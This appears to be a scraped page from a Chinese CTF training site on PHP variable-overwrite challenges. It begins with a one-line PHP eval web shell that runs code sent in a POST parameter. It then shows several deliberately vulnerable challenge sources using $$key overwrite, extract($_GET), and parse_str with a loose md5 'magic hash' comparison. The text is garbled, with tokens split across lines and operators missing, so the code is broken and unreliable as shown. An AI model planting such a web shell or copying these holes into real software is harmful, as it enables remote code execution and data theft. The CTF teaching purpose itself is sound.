<script language
=
"pHp"
>@
eval
($_POST[
'UzJu'
])<
/
script>
<?php
include
"flag.php"
;
$_403
"Access Denied"
$_200
"Welcome Admin"
if
($_SERVER[
"REQUEST_METHOD"
] !
"POST"
){
需要POST方法
die(
"hetianlab flag is here :biubiubiu"
);
}
(!isset($_POST[
"flag"
])){
需要POST参数
flag
die($_403);
}foreach ($_GET as $key
> $value){
遍历GET方法所传值
$$key
$$value;
}foreach ($_POST as $key
遍历POST方法所传值
$value;
$flag){
echo
"This is your flag : "
. $flag .
"\n"
die($_200);
?>
查看源代码
<html>
<head>
<meta http
-
equiv
"Content-Type"
content
"text/html; charset=utf-8"
>
<title>学会变量覆盖<
title>
<
head>
<body>
<!
$flag
'xxxx'
:
extract($_GET):
(isset($gift))
Scontent
@trim(file_get_contents($flag)):
(Sgift
$content)
echo"flag
else
' oh . . '
body>
html>
题目描述
源代码
highlight_file(
'source.txt'
"<br><br>"
'xxxxxxxx'
$msg_giveme
'Give me the flag!'
$msg_getout
'No this. Get out!'
(!isset($_GET[
'flag'
]) && !isset($_POST[
exit($msg_giveme);
]
|| $_GET[
exit($msg_getout);
foreach ($_POST as $key
> $value) {
foreach ($_GET as $key
'the flag is : '
. $flag;
flag{asdhetianlab}
header(
"Content-Type: text/html;charset=utf-8"
error_reporting(
0
(empty($_GET[
'id'
]))
{
show_source(__FILE__);
die();
include (
'flag.php'
$a
"www.hetianlab.com "
$
id
$_GET[
];
@parse_str
($
($a[
'QNKCDZO'
&& md5($a[
])
md5(
))
echo $flag;
exit(
'其实很简单其实并不难!'
[课程]Android-CTF解题方法汇总!
hudte 图片有点模糊耶